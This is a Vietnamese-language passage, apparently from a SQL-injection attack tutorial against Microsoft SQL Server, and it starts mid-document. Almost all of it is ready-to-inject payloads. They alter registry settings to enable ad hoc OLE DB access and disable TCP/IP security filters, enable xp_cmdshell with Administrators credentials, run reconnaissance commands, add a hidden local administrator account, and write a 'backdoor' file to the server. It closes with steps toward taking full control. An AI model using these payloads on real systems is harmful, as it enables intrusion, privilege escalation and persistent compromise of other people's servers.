-Nếu là trường kiểu ngày/giờ
Dùng: char,nchar,nvarchar,varchar


B. Upload backdoor lên host
1. Xác định mức quyền và cho phép thực thilệnh của MS SQL server
'Xác định mức quyền
;select * from openrowset('sqloledb','';;,'')--
'Thay đổi mức quyền
;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1--
;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0--
'Xoá bỏ và khôi phục Log và firewall trong MS SQL
;exec master..xp_regdeletevalue
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'--
;exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters',REG_DWORD,0--
'Cho phép sử dụng MASTER..XP_CMDSHELL & ALLOW UPDATES
;select * from openrowset('sqloledb',
'server=Digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec
sp_configure
''allow updates'', ''1'' reconfigure with override')--

2. Do thám đưa thêm các thông tin
'Do tham IP của server và đưa vào bảng testip
;drop table testip create table testip(stt int identity,dcip
varchar(1000)) insert into testip exec master..xp_cmdshell 'ipconfig'--
'Cộng thêm một quyền quản trị mới
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a
/add"')-- (%26 == "&")

3. Đưa backdoor lên server'Upload backdoor lên server vào thư mục C:\WINDOWS\system32
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec master..xp_cmdshell "chube >>runfile.txt"')--
;select * from openrowset('sqloledb',
'server=digital;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off
select
1 exec master..xp_cmdshell "chube >>runfile.txt & hamhoc
>>runfile.txt"')--
'Kiểm tra xem backdoor đã upload thành công chưa
;drop table testip create table testip(stt int identity,dcip
varchar(1000)) insert into testip exec master..xp_cmdshell 'dir
runfile.txt'--
C. Chạy backdoor trên server
1. Xác nhận backdoor đã được kích hoạt
2. Chiếm toàn bộ quyền điều khiển server